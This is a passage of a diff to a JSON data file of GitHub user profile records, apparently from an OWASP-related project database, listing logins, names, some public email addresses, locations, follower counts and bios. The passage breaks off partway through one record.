@@ -382528,24 +639377,49 @@ }, { "model": "github.user", - "pk": 892, + "pk": 6139, "fields": { - "nest_created_at": "2024-09-11T22:14:55.817Z", - "nest_updated_at": "2024-09-11T22:14:55.817Z", - "name": "Luca", - "login": "lsantaniello", + "nest_created_at": "2024-09-22T06:45:47.189Z", + "nest_updated_at": "2024-09-22T18:32:21.548Z", + "name": "nulltoken", + "login": "nulltoken", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1018939?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/92363?v=4", + "company": "", + "location": "Paris, France", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 88, + "public_gists_count": 15, + "public_repositories_count": 31, + "created_at": "2009-06-05T19:19:48Z", + "updated_at": "2024-09-03T11:20:46Z", + "node_id": "MDQ6VXNlcjkyMzYz", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6140, + "fields": { + "nest_created_at": "2024-09-22T06:45:51.972Z", + "nest_updated_at": "2024-09-22T18:32:26.160Z", + "name": "Harry P", + "login": "fervidnerd", + "email": "hpapaxen@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2028137?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 20, - "followers_count": 3, + "following_count": 1, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2011-09-01T08:43:47Z", - "updated_at": "2024-07-12T18:05:30Z", - "node_id": "MDQ6VXNlcjEwMTg5Mzk=", + "public_repositories_count": 1, + "created_at": "2012-07-23T15:53:43Z", + "updated_at": "2024-09-13T11:45:31Z", + "node_id": "MDQ6VXNlcjIwMjgxMzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382553,24 +639427,24 @@ }, { "model": "github.user", - "pk": 893, + "pk": 6141, "fields": { - "nest_created_at": "2024-09-11T22:14:56.689Z", - "nest_updated_at": "2024-09-11T22:14:57.540Z", - "name": "NamNguyen", - "login": "thanhnambkhn", + "nest_created_at": "2024-09-22T06:45:52.298Z", + "nest_updated_at": "2024-09-22T18:32:26.483Z", + "name": "Ray", + "login": "raybeorn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4994500?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1497330?v=4", "company": "", - "location": "Hanoi, Vietnam", + "location": "The Empire", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2013-07-12T04:20:58Z", - "updated_at": "2024-09-11T08:26:46Z", - "node_id": "MDQ6VXNlcjQ5OTQ1MDA=", + "following_count": 14, + "followers_count": 16, + "public_gists_count": 2, + "public_repositories_count": 8, + "created_at": "2012-03-03T18:55:01Z", + "updated_at": "2022-11-24T15:43:45Z", + "node_id": "MDQ6VXNlcjE0OTczMzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382578,24 +639452,24 @@ }, { "model": "github.user", - "pk": 894, + "pk": 6142, "fields": { - "nest_created_at": "2024-09-11T22:14:58.371Z", - "nest_updated_at": "2024-09-11T22:15:00.128Z", - "name": "P-A", - "login": "P-A-C", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23724240?v=4", + "nest_created_at": "2024-09-22T06:45:52.612Z", + "nest_updated_at": "2024-09-22T18:32:26.793Z", + "name": "Jerry Hoff", + "login": "jerryhoff", + "email": "jerry@jerryhoff.net", + "avatar_url": "https://avatars.githubusercontent.com/u/476117?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 32, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-11-24T15:17:51Z", - "updated_at": "2019-12-13T22:47:46Z", - "node_id": "MDQ6VXNlcjIzNzI0MjQw", + "public_repositories_count": 1, + "created_at": "2010-11-10T17:49:00Z", + "updated_at": "2023-11-13T21:09:15Z", + "node_id": "MDQ6VXNlcjQ3NjExNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382603,74 +639477,74 @@ }, { "model": "github.user", - "pk": 895, + "pk": 6143, "fields": { - "nest_created_at": "2024-09-11T22:15:01.007Z", - "nest_updated_at": "2024-09-11T22:15:01.007Z", - "name": "Emmanuel Jonah", - "login": "tejkweku", - "email": "jonah.emma.kweku@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7029109?v=4", + "nest_created_at": "2024-09-22T06:45:56.946Z", + "nest_updated_at": "2024-09-22T18:32:30.985Z", + "name": "Rahul Chaudhary", + "login": "rash805115", + "email": "rahul300chaudhary400@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4465074?v=4", "company": "", - "location": "Kumasi, Ghana", + "location": "Richmond, Virginia, USA", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2014-03-22T06:12:47Z", - "updated_at": "2023-07-18T12:42:45Z", - "node_id": "MDQ6VXNlcjcwMjkxMDk=", + "following_count": 3, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 13, + "created_at": "2013-05-18T13:56:13Z", + "updated_at": "2024-07-29T11:19:50Z", + "node_id": "MDQ6VXNlcjQ0NjUwNzQ=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 896, + "pk": 6144, "fields": { - "nest_created_at": "2024-09-11T22:15:01.958Z", - "nest_updated_at": "2024-09-11T22:15:01.958Z", - "name": "Dave Smith", - "login": "veotax", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14900285?v=4", - "company": "Amalga", - "location": "Toronto, Canada", + "nest_created_at": "2024-09-22T06:45:57.297Z", + "nest_updated_at": "2024-09-22T18:32:31.294Z", + "name": "Abhishek Das", + "login": "abhshkdz", + "email": "das.abhshk@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1156489?v=4", + "company": "FAIR, Meta AI", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-09-30T03:06:42Z", - "updated_at": "2023-05-28T10:14:29Z", - "node_id": "MDQ6VXNlcjE0OTAwMjg1", - "bio": "", + "following_count": 98, + "followers_count": 1767, + "public_gists_count": 15, + "public_repositories_count": 35, + "created_at": "2011-10-27T19:53:27Z", + "updated_at": "2024-07-13T18:32:37Z", + "node_id": "MDQ6VXNlcjExNTY0ODk=", + "bio": "Research Scientist at FAIR\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "abhshkdz" } }, { "model": "github.user", - "pk": 897, + "pk": 6145, "fields": { - "nest_created_at": "2024-09-11T22:15:02.838Z", - "nest_updated_at": "2024-09-11T22:15:02.838Z", + "nest_created_at": "2024-09-22T06:45:57.621Z", + "nest_updated_at": "2024-09-22T18:32:31.604Z", "name": "", - "login": "randamezrag", + "login": "SvenRtbg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51890638?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/416600?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-06-16T21:05:01Z", - "updated_at": "2024-05-16T14:26:50Z", - "node_id": "MDQ6VXNlcjUxODkwNjM4", + "following_count": 1, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 47, + "created_at": "2010-09-26T17:35:26Z", + "updated_at": "2024-09-01T21:04:15Z", + "node_id": "MDQ6VXNlcjQxNjYwMA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382678,24 +639552,24 @@ }, { "model": "github.user", - "pk": 898, + "pk": 6146, "fields": { - "nest_created_at": "2024-09-11T22:15:03.812Z", - "nest_updated_at": "2024-09-11T22:15:03.812Z", - "name": "", - "login": "vgavrilovikj", + "nest_created_at": "2024-09-22T06:45:58.926Z", + "nest_updated_at": "2024-09-22T18:32:32.857Z", + "name": "Paulo Guerreiro", + "login": "paulocmguerreiro", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29601489?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5602722?v=4", "company": "", - "location": "", + "location": "Portugal", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 4, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2017-06-21T12:08:58Z", - "updated_at": "2024-08-17T11:38:27Z", - "node_id": "MDQ6VXNlcjI5NjAxNDg5", + "public_repositories_count": 3, + "created_at": "2013-10-03T11:28:09Z", + "updated_at": "2024-03-26T13:25:19Z", + "node_id": "MDQ6VXNlcjU2MDI3MjI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382703,124 +639577,174 @@ }, { "model": "github.user", - "pk": 899, + "pk": 6147, "fields": { - "nest_created_at": "2024-09-11T22:15:04.701Z", - "nest_updated_at": "2024-09-11T22:15:04.701Z", - "name": "", - "login": "CabrioCar", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/62959147?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T06:45:59.249Z", + "nest_updated_at": "2024-09-22T20:26:05.768Z", + "name": "Mennouchi Islam Azeddine", + "login": "islamoc", + "email": "azeddine.mennouchi@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/4500138?v=4", + "company": "@DalilTechnology ", + "location": "Toronto", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 29, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-03-31T18:19:18Z", - "updated_at": "2020-03-31T18:19:18Z", - "node_id": "MDQ6VXNlcjYyOTU5MTQ3", + "public_repositories_count": 13, + "created_at": "2013-05-22T14:06:53Z", + "updated_at": "2023-08-28T20:07:20Z", + "node_id": "MDQ6VXNlcjQ1MDAxMzg=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 900, + "pk": 6148, "fields": { - "nest_created_at": "2024-09-11T22:15:05.566Z", - "nest_updated_at": "2024-09-11T22:15:05.566Z", - "name": "", - "login": "NeorsdEmployee", + "nest_created_at": "2024-09-22T06:46:00.222Z", + "nest_updated_at": "2024-09-22T18:32:34.107Z", + "name": "Phil Sturgeon", + "login": "philsturgeon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76214023?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67381?v=4", + "company": "@protect-earth & @GreenTurtleTech ", + "location": "Europe", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-12-18T13:30:28Z", - "updated_at": "2024-08-30T19:39:09Z", - "node_id": "MDQ6VXNlcjc2MjE0MDIz", - "bio": "", + "following_count": 159, + "followers_count": 4080, + "public_gists_count": 97, + "public_repositories_count": 83, + "created_at": "2009-03-26T10:58:12Z", + "updated_at": "2024-09-21T07:28:21Z", + "node_id": "MDQ6VXNlcjY3Mzgx", + "bio": "Using APIs to reforest the UK @protect-earth, decarbonizing software at @GreenTurtleTech, and teaching about APIs at @apisyouwonthate. Ex-@wework @PyroCMS ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "philsturgeon" } }, { "model": "github.user", - "pk": 901, + "pk": 6149, "fields": { - "nest_created_at": "2024-09-11T22:15:06.407Z", - "nest_updated_at": "2024-09-13T04:55:54.807Z", - "name": "L", - "login": "landau", + "nest_created_at": "2024-09-22T06:46:05.316Z", + "nest_updated_at": "2024-09-22T18:32:39.233Z", + "name": "Al Snow", + "login": "jasnow", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/911603?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43523?v=4", + "company": "Security Advisory Data Scientist ", + "location": "Metro Atlanta, GA; USA", + "collaborators_count": 0, + "following_count": 64, + "followers_count": 74, + "public_gists_count": 89, + "public_repositories_count": 492, + "created_at": "2008-12-31T16:08:22Z", + "updated_at": "2024-08-24T11:58:46Z", + "node_id": "MDQ6VXNlcjQzNTIz", + "bio": "Security Advisory Data Scientist ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6150, + "fields": { + "nest_created_at": "2024-09-22T06:46:06.954Z", + "nest_updated_at": "2024-09-22T18:32:41.000Z", + "name": "jamesejr", + "login": "jamesejr", + "email": "jamesejr@proton.me", + "avatar_url": "https://avatars.githubusercontent.com/u/2074717?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 19, - "public_repositories_count": 60, - "created_at": "2011-07-13T01:10:44Z", - "updated_at": "2024-09-11T17:57:52Z", - "node_id": "MDQ6VXNlcjkxMTYwMw==", - "bio": "", + "following_count": 202, + "followers_count": 85, + "public_gists_count": 11, + "public_repositories_count": 17, + "created_at": "2012-08-01T02:13:06Z", + "updated_at": "2024-09-19T06:07:15Z", + "node_id": "MDQ6VXNlcjIwNzQ3MTc=", + "bio": "Detection & Response Engineering", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 902, + "pk": 6151, "fields": { - "nest_created_at": "2024-09-11T22:15:27.090Z", - "nest_updated_at": "2024-09-12T02:38:44.843Z", - "name": "Erlend Oftedal", - "login": "eoftedal", - "email": "erlend@oftedal.no", - "avatar_url": "https://avatars.githubusercontent.com/u/238804?v=4", + "nest_created_at": "2024-09-22T06:46:07.280Z", + "nest_updated_at": "2024-09-22T18:32:41.385Z", + "name": "relotnek", + "login": "relotnek", + "email": "ken@kentoler.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1391674?v=4", "company": "", - "location": "Oslo, Norway", + "location": "New York", "collaborators_count": 0, - "following_count": 68, - "followers_count": 174, - "public_gists_count": 22, - "public_repositories_count": 92, - "created_at": "2010-04-07T14:34:44Z", - "updated_at": "2024-08-26T13:04:26Z", - "node_id": "MDQ6VXNlcjIzODgwNA==", + "following_count": 5, + "followers_count": 12, + "public_gists_count": 9, + "public_repositories_count": 88, + "created_at": "2012-01-30T15:09:06Z", + "updated_at": "2024-09-10T03:51:56Z", + "node_id": "MDQ6VXNlcjEzOTE2NzQ=", "bio": "", "is_hireable": false, - "twitter_username": "webtonull" + "twitter_username": "relotnek" } }, { "model": "github.user", - "pk": 903, + "pk": 6152, "fields": { - "nest_created_at": "2024-09-11T22:15:32.428Z", - "nest_updated_at": "2024-09-11T22:15:32.428Z", - "name": "Stevo", - "login": "ppsel03", + "nest_created_at": "2024-09-22T06:46:07.593Z", + "nest_updated_at": "2024-09-22T18:32:41.704Z", + "name": "chrismo", + "login": "chrismo", + "email": "chrismo@clabs.org", + "avatar_url": "https://avatars.githubusercontent.com/u/8092?v=4", + "company": "cLabs, Inc.", + "location": "denton, tx", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 50, + "public_gists_count": 26, + "public_repositories_count": 82, + "created_at": "2008-04-21T19:11:05Z", + "updated_at": "2024-07-08T16:45:06Z", + "node_id": "MDQ6VXNlcjgwOTI=", + "bio": "i mash keys", + "is_hireable": true, + "twitter_username": "the_chrismo" + } +}, +{ + "model": "github.user", + "pk": 6153, + "fields": { + "nest_created_at": "2024-09-22T06:46:08.561Z", + "nest_updated_at": "2024-09-22T18:32:42.688Z", + "name": "Yuji Matsunaga", + "login": "jx6f", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4769609?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4547981?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 11, + "followers_count": 11, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-06-22T04:46:49Z", - "updated_at": "2019-10-26T15:57:40Z", - "node_id": "MDQ6VXNlcjQ3Njk2MDk=", + "public_repositories_count": 7, + "created_at": "2013-05-28T10:19:15Z", + "updated_at": "2023-06-26T12:03:07Z", + "node_id": "MDQ6VXNlcjQ1NDc5ODE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382828,24 +639752,24 @@ }, { "model": "github.user", - "pk": 904, + "pk": 6154, "fields": { - "nest_created_at": "2024-09-11T22:15:33.757Z", - "nest_updated_at": "2024-09-11T22:15:33.757Z", + "nest_created_at": "2024-09-22T06:46:08.872Z", + "nest_updated_at": "2024-09-22T18:32:42.994Z", "name": "", - "login": "jkariotisAtNexIt", + "login": "nVisium-ken-johnson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7716193?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26069405?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-05-27T17:38:00Z", - "updated_at": "2016-02-27T16:36:48Z", - "node_id": "MDQ6VXNlcjc3MTYxOTM=", + "public_repositories_count": 1, + "created_at": "2017-02-27T18:15:30Z", + "updated_at": "2017-07-26T12:36:15Z", + "node_id": "MDQ6VXNlcjI2MDY5NDA1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382853,24 +639777,24 @@ }, { "model": "github.user", - "pk": 905, + "pk": 6155, "fields": { - "nest_created_at": "2024-09-11T22:15:34.602Z", - "nest_updated_at": "2024-09-11T22:15:34.602Z", - "name": "", - "login": "EliezerBee", + "nest_created_at": "2024-09-22T06:46:09.190Z", + "nest_updated_at": "2024-09-22T18:32:56.782Z", + "name": "Jack Mannino", + "login": "nvisium-jack-mannino", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5578694?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/531454?v=4", + "company": "nVisium", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-09-30T17:53:24Z", - "updated_at": "2020-12-03T17:25:04Z", - "node_id": "MDQ6VXNlcjU1Nzg2OTQ=", + "following_count": 66, + "followers_count": 106, + "public_gists_count": 16, + "public_repositories_count": 20, + "created_at": "2010-12-21T04:42:57Z", + "updated_at": "2022-11-30T16:15:01Z", + "node_id": "MDQ6VXNlcjUzMTQ1NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -382878,149 +639802,149 @@ }, { "model": "github.user", - "pk": 906, + "pk": 6156, "fields": { - "nest_created_at": "2024-09-11T22:15:35.922Z", - "nest_updated_at": "2024-09-18T18:22:43.395Z", - "name": "Kevin Kuszyk", - "login": "kevinkuszyk", - "email": "kevin.kuszyk@burendo.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2734580?v=4", - "company": "@BurendoUK ", - "location": "Leeds, UK", + "nest_created_at": "2024-09-22T06:46:09.517Z", + "nest_updated_at": "2024-09-22T18:32:43.631Z", + "name": "Tada, Tadashi", + "login": "tdtds", + "email": "t@tdtds.jp", + "avatar_url": "https://avatars.githubusercontent.com/u/65746?v=4", + "company": "freee", + "location": "Japan", "collaborators_count": 0, - "following_count": 6, - "followers_count": 34, - "public_gists_count": 4, - "public_repositories_count": 52, - "created_at": "2012-11-06T11:40:17Z", - "updated_at": "2024-08-14T14:27:45Z", - "node_id": "MDQ6VXNlcjI3MzQ1ODA=", - "bio": "Cloud Architect at Burendo", + "following_count": 17, + "followers_count": 149, + "public_gists_count": 23, + "public_repositories_count": 56, + "created_at": "2009-03-22T12:40:31Z", + "updated_at": "2024-09-14T11:25:35Z", + "node_id": "MDQ6VXNlcjY1NzQ2", + "bio": "A programmer, a security resercher and a servant of two cats.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "tdtds" } }, { "model": "github.user", - "pk": 907, + "pk": 6157, "fields": { - "nest_created_at": "2024-09-11T22:15:36.758Z", - "nest_updated_at": "2024-09-11T22:15:36.758Z", - "name": "Curtis Carter", - "login": "digitalcoyote", - "email": "coyote@duck.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16868093?v=4", + "nest_created_at": "2024-09-22T06:46:09.832Z", + "nest_updated_at": "2024-09-22T18:32:43.945Z", + "name": "Adi", + "login": "adiov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7467822?v=4", "company": "", - "location": "NorthEast Arkansas", + "location": "Finland", "collaborators_count": 0, - "following_count": 9, - "followers_count": 22, - "public_gists_count": 4, - "public_repositories_count": 32, - "created_at": "2016-01-24T19:44:07Z", - "updated_at": "2024-09-06T11:09:40Z", - "node_id": "MDQ6VXNlcjE2ODY4MDkz", - "bio": "Cross-Platform .Net Developer", + "following_count": 0, + "followers_count": 154, + "public_gists_count": 3, + "public_repositories_count": 3, + "created_at": "2014-05-02T14:57:10Z", + "updated_at": "2024-09-15T00:46:36Z", + "node_id": "MDQ6VXNlcjc0Njc4MjI=", + "bio": "Making the world ever so slightly safer", "is_hireable": false, - "twitter_username": "codingcoyote" + "twitter_username": "" } }, { "model": "github.user", - "pk": 908, + "pk": 6158, "fields": { - "nest_created_at": "2024-09-11T22:15:47.838Z", - "nest_updated_at": "2024-09-11T22:15:47.838Z", - "name": "", - "login": "muzahm", + "nest_created_at": "2024-09-22T06:46:10.146Z", + "nest_updated_at": "2024-09-22T20:31:13.731Z", + "name": "Bharath", + "login": "0xbharath", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5666233?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9979523?v=4", + "company": "Disruptive Labs", + "location": "Bangalore", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-10-11T17:27:37Z", - "updated_at": "2016-02-27T11:39:21Z", - "node_id": "MDQ6VXNlcjU2NjYyMzM=", + "following_count": 304, + "followers_count": 354, + "public_gists_count": 20, + "public_repositories_count": 139, + "created_at": "2014-11-27T17:30:39Z", + "updated_at": "2024-09-04T05:02:54Z", + "node_id": "MDQ6VXNlcjk5Nzk1MjM=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "0xbharath" } }, { "model": "github.user", - "pk": 909, + "pk": 6159, "fields": { - "nest_created_at": "2024-09-11T22:15:52.425Z", - "nest_updated_at": "2024-09-11T22:15:57.444Z", - "name": "Andrew Carter", - "login": "AndrewCarterUK", - "email": "andrewcarter1992@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6486835?v=4", - "company": "@SmarterDM ", - "location": "United Kingdom", + "nest_created_at": "2024-09-22T06:46:10.773Z", + "nest_updated_at": "2024-09-22T18:32:44.917Z", + "name": "Claudio Benvenuti", + "login": "giovantenne", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/917400?v=4", + "company": "HardyPress srl", + "location": "Florence", "collaborators_count": 0, - "following_count": 3, - "followers_count": 209, - "public_gists_count": 13, - "public_repositories_count": 94, - "created_at": "2014-01-23T23:50:03Z", - "updated_at": "2024-06-24T22:28:37Z", - "node_id": "MDQ6VXNlcjY0ODY4MzU=", - "bio": "Software Developer, Physics Graduate, BJJ Enthusiast and Amateur Photographer.", + "following_count": 13, + "followers_count": 49, + "public_gists_count": 0, + "public_repositories_count": 53, + "created_at": "2011-07-15T10:35:21Z", + "updated_at": "2024-07-05T16:58:50Z", + "node_id": "MDQ6VXNlcjkxNzQwMA==", + "bio": "", "is_hireable": true, - "twitter_username": "" + "twitter_username": "giovantenne" } }, { "model": "github.user", - "pk": 910, + "pk": 6160, "fields": { - "nest_created_at": "2024-09-11T22:15:58.321Z", - "nest_updated_at": "2024-09-18T18:22:50.985Z", - "name": "Chris Cornutt", - "login": "enygma", - "email": "enygma@github.com", - "avatar_url": "https://avatars.githubusercontent.com/u/66796?v=4", + "nest_created_at": "2024-09-22T06:46:11.221Z", + "nest_updated_at": "2024-09-22T18:32:45.247Z", + "name": "Eli Block", + "login": "eliblock", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3347571?v=4", "company": "", - "location": "Whitefish, Montana", + "location": "", "collaborators_count": 0, - "following_count": 175, - "followers_count": 332, - "public_gists_count": 29, - "public_repositories_count": 103, - "created_at": "2009-03-25T01:29:36Z", - "updated_at": "2024-08-11T20:30:58Z", - "node_id": "MDQ6VXNlcjY2Nzk2", - "bio": "Senior AppSec Engineer, Product Security @ GitHub.\r\nWriter of codes.\r\nProtector of applications.\r\nBeer snob.", + "following_count": 0, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2013-01-23T04:45:59Z", + "updated_at": "2024-08-09T14:03:47Z", + "node_id": "MDQ6VXNlcjMzNDc1NzE=", + "bio": "", "is_hireable": false, - "twitter_username": "enygma" + "twitter_username": "" } }, { "model": "github.user", - "pk": 911, + "pk": 6161, "fields": { - "nest_created_at": "2024-09-11T22:16:03.120Z", - "nest_updated_at": "2024-09-11T22:16:33.784Z", - "name": "Ken Johnson", - "login": "cktricky", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/544667?v=4", - "company": "@github ", - "location": "", + "nest_created_at": "2024-09-22T06:46:11.590Z", + "nest_updated_at": "2024-09-22T18:32:45.574Z", + "name": "Henry Jenkins", + "login": "steakunderscore", + "email": "github@henryjenkins.name", + "avatar_url": "https://avatars.githubusercontent.com/u/92489?v=4", + "company": "@thought-machine", + "location": "London, UK", "collaborators_count": 0, - "following_count": 164, - "followers_count": 175, - "public_gists_count": 34, - "public_repositories_count": 47, - "created_at": "2011-01-02T22:41:40Z", - "updated_at": "2024-09-09T10:23:30Z", - "node_id": "MDQ6VXNlcjU0NDY2Nw==", + "following_count": 44, + "followers_count": 53, + "public_gists_count": 11, + "public_repositories_count": 82, + "created_at": "2009-06-06T05:51:23Z", + "updated_at": "2024-08-08T20:27:40Z", + "node_id": "MDQ6VXNlcjkyNDg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383028,149 +639952,149 @@ }, { "model": "github.user", - "pk": 912, + "pk": 6162, "fields": { - "nest_created_at": "2024-09-11T22:16:04.395Z", - "nest_updated_at": "2024-09-11T22:16:08.433Z", - "name": "Mike McCabe", - "login": "mccabe615", + "nest_created_at": "2024-09-22T06:46:11.909Z", + "nest_updated_at": "2024-09-22T18:32:45.888Z", + "name": "Jayson Grace", + "login": "l50", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1463253?v=4", - "company": "Cloud Security Partners", - "location": "Reston, VA", + "avatar_url": "https://avatars.githubusercontent.com/u/4031126?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 34, - "followers_count": 65, - "public_gists_count": 84, - "public_repositories_count": 66, - "created_at": "2012-02-22T22:09:52Z", - "updated_at": "2024-09-03T15:15:06Z", - "node_id": "MDQ6VXNlcjE0NjMyNTM=", + "followers_count": 85, + "public_gists_count": 10, + "public_repositories_count": 125, + "created_at": "2013-04-01T23:01:48Z", + "updated_at": "2024-09-20T00:59:12Z", + "node_id": "MDQ6VXNlcjQwMzExMjY=", "bio": "", "is_hireable": false, - "twitter_username": "mccabe615" + "twitter_username": "" } }, { "model": "github.user", - "pk": 913, + "pk": 6163, "fields": { - "nest_created_at": "2024-09-11T22:16:09.695Z", - "nest_updated_at": "2024-09-11T22:16:09.695Z", - "name": "Joe Mastey", - "login": "jmmastey", + "nest_created_at": "2024-09-22T06:46:12.537Z", + "nest_updated_at": "2024-09-22T18:32:46.508Z", + "name": "Tom Copeland", + "login": "tommotorefi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/302011?v=4", - "company": "", - "location": "Chicago IL", + "avatar_url": "https://avatars.githubusercontent.com/u/25752581?v=4", + "company": "MotoRefi", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 81, - "public_gists_count": 52, - "public_repositories_count": 34, - "created_at": "2010-06-10T16:25:45Z", - "updated_at": "2024-06-10T23:36:06Z", - "node_id": "MDQ6VXNlcjMwMjAxMQ==", - "bio": "", + "following_count": 1, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2017-02-13T19:24:09Z", + "updated_at": "2018-10-22T01:38:24Z", + "node_id": "MDQ6VXNlcjI1NzUyNTgx", + "bio": "Programmer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 914, + "pk": 6164, "fields": { - "nest_created_at": "2024-09-11T22:16:10.985Z", - "nest_updated_at": "2024-09-11T22:16:10.985Z", - "name": "LongCat", - "login": "pich4ya", + "nest_created_at": "2024-09-22T06:46:12.886Z", + "nest_updated_at": "2024-09-22T18:32:46.855Z", + "name": "", + "login": "ecneladis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2099767?v=4", - "company": "Siam Thanat Hack", - "location": "Bangkok, Thailand", + "avatar_url": "https://avatars.githubusercontent.com/u/6756744?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 106, - "public_gists_count": 121, - "public_repositories_count": 48, - "created_at": "2012-08-05T20:58:03Z", - "updated_at": "2024-03-03T04:26:22Z", - "node_id": "MDQ6VXNlcjIwOTk3Njc=", - "bio": "Will Hack for Free Shabu Shabu.", + "followers_count": 31, + "public_gists_count": 12, + "public_repositories_count": 66, + "created_at": "2014-02-22T15:12:16Z", + "updated_at": "2024-08-13T12:20:34Z", + "node_id": "MDQ6VXNlcjY3NTY3NDQ=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ecneladis" } }, { "model": "github.user", - "pk": 915, + "pk": 6165, "fields": { - "nest_created_at": "2024-09-11T22:16:11.865Z", - "nest_updated_at": "2024-09-11T22:16:25.177Z", - "name": "John Poulin", - "login": "nvisium-john-poulin", + "nest_created_at": "2024-09-22T06:46:13.214Z", + "nest_updated_at": "2024-09-22T18:32:47.164Z", + "name": "", + "login": "godinezj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26073088?v=4", - "company": "@nVisium ", + "avatar_url": 